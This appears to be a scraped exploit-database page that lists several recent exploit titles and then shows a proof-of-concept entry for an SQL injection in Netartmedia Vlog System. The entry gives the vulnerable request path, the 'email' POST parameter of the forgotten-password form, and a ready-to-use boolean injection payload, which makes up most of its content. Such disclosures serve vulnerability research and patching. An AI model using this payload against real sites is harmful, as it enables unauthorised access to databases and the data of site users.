
8 changes to exploits/shellcodes Canarytokens 2019-03-01 - Detection Bypass DVD X Player 5.5.3 - '.plf' Buffer Overflow Netartmedia Vlog System - 'email' SQL Injection Rails 5.2.1 - Arbitrary File Content Disclosure The Company Business Website CMS - Multiple Vulnerabilities uHotelBooking System - 'system_page' SQL Injection Placeto CMS Alpha v4 - 'page' SQL Injection Bootstrapy CMS - Multiple SQL Injection
13 lines
No EOL
510 B
Text
13 lines
No EOL
510 B
Text
# Exploit Title: Netartmedia Vlog System - 'email' SQL Injection
|
|
# Date: 20.03.2019
|
|
# Exploit Author: Ahmet Ümit BAYRAM
|
|
# Vendor Homepage: https://www.netartmedia.net/vlogsystem/
|
|
# Demo Site: https://www.phpscriptdemos.com/vlogs/
|
|
# Version: Lastest
|
|
# Tested on: Kali Linux
|
|
# CVE: N/A
|
|
----- PoC: SQLi -----
|
|
# Request: http://localhost/[PATH]/index.php
|
|
# Vulnerable Parameter: email (POST)
|
|
# Attack
|
|
Pattern: ProceedSend=1&email=-1'%20OR%203*2*1=6%20AND%20000371=000371%20--%20&mod=forgotten_password |